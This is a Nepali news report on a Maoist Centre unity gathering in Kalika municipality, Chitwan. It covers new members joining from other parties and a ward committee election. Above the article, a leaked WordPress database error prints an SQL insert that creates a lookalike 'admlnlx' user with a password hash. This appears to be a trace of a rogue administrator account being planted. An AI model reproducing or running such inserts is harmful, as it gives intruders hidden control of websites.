WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdJhQoaFIb1VHSShvhTc0wjVgDZ5Po1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:29:25', '', 'admlnlx', 'admlnlx')
चितवन, माघ २४–
नेकपा माओवादी केन्द्र कालिका नगरपालिका नगरस्तरीय एकता भेला सम्पन्न भएको छ । माओवादी केन्द्रका प्रमुख स्थाई कमिटी सदस्य विश्वझक्त दुलाल (आहुती)को प्रमुख आतिथ्यतामा भेला सम्पन्न भएको हो । सो अवसरमा बोल्दै आहुतीले आगामी चुनावका लागि सबै कार्यकर्ता तयारी अवस्थामा रहन निर्देशन दिए ।
नगर अध्यक्ष रामध्वज डल्लाकोटी (विवेक)को अध्यक्षतामा सम्पन्न भेलामा करिब १ सय बढी एमाले र काँग्रेस परित्याग गरि आएका नयाँ कार्यकर्ताहरुलाई प्रमुख अतिथि आहुतीले रातो टिका लगाई प्रवेश गराएका थिए । कार्यक्रममा बाल्ने अधिकांश नवप्रवेशीहरुले देश निकासको एक मात्र विल्कप माओवादी रहेको भन्दै सबैलाई माओवादीमा समाहित गर्न आग्रह गरे ।
भेलामा माओवादी केन्द्रका जिल्ला ईन्चार्ज ईश्वरी भट्टराई, जिल्ला अध्यक्ष यमबहादुर परियार, सह–ईन्चार्ज कञ्चन खनाल, जिल्ला सदस्य संगिता भट्टराईलगायतले बोलेका थिए ।
वडा संयोजकमा दिलबहादुर बुढाथोकी
माओवादी केन्द्र वडा १५ माधवपुरमा दिलबहादुर बुढाथोकीको संयोजकत्वमा २५ सदस्ययी नयाँ कार्य समिति चयन गरेको छ । जसको सहसंयोजक चञ्चला घिमिरे र विनोद ढकाल रहेका छन् ।